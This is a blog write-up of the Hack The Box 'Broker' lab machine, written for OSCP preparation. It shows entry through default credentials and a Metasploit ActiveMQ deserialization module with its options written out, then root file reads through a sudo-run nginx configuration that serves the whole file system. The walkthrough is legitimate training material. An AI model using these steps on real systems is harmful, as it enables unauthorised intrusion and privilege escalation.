OSCP PREP BOX 3: HtB Broker

Written By Ryan Daly

Key Takeaways:

  • Nginx runs with WebDav enabled and we can use vulnerabilities within WebDav to PUT files.

  • We can use the .conf files for web servers as templates for our own.

  • Don’t be in a rush.. take time to learn about how the apps work, where they store information, etc. We won’t always come across services we know about. We have to be willing to take the time to learn.


Broker! This box was super tricky for the priv esc. The entry into the machine was actually quite easy through the metasploit module. I was able to get user access within just a few minutes. The priv esc on this box took me about 5 hours of pain.. I did ultimately have to get some assistance from Ipsec’s walkthrough on this. I kept having issues with the WebDav PUT method to get RCE. As I’ll go through the walkthrough, I was able to get file reads as root, but was struggling for RCE as root.

Anyways, default nmap scan shows us this:

From the scan we can see we have a web server that’s 401 unauthorized on port 80 and a few other services. I navigated to it and prepared myself to be writing a Basic Auth brute force (covered in the eWPT course), but instead I was able to get in in seconds by using admin:admin.

This took me to a basic web page with a title of: ACTIVEMQ

I took to searchsploit and saw there was a deserialization attack and also a metasploit module available.

I launched msfconsole, searched activemq, and selected the 2023 exploit.

From there, I made the following configurations:

set srvhost tun0

set lhost tun0

set rhosts <target IP>

set target 1

run

Now is where the real work begins… this is where I spent HOURS researching nginx configurations and more. I don’t have a ton of web dev experience, so for me this was exceedingly convoluted but I ended up learning a lot.

I ran my usual enumeration and sudo -l is always one of my first checks. Off the bat we get this:

So, I’ll summarize briefly what I learned.. the nginx binary actually serves to launch an nginx web server. If we assign it a .conf file, we can configure options for this web server. If we look at the nginx.conf file running on broker.htb we can use that as a template for ours.

Okay so there’s more to the .conf file but it got cut off in the image. But just analyzing the top, we see that this is a configuration file running http under the user .data. Some of the files it includes are under the /etc/nginx/modules-enabled/ directory. So, what if we launched our own nginx http server running under user root?

So to help with that, we can steal the formatting for how they have broker.htb set up. This is located under /etc/nginx/sites-enabled/ and we can look at the HTTP server they have set up:

So now, we can add that into our .conf file underneath the HTTP section, listen on a different port, and make the path the root of the file system /.

So now, we can add this to a directory we control. I used /dev/shm/ and then we can run:

sudo nginx -c /dev/shm/nginx.conf

We can verify this .conf file is up and running a web server using:

ss -lntp

Now this gives us directory read over the whole file system. My initial getting of the flag was through just using curl to query the web server we set up:






Ryan Daly
Previous

OSCP PREP BOX 4: HtB Soccer
Next

OSCP PREP BOX 2: HtB Help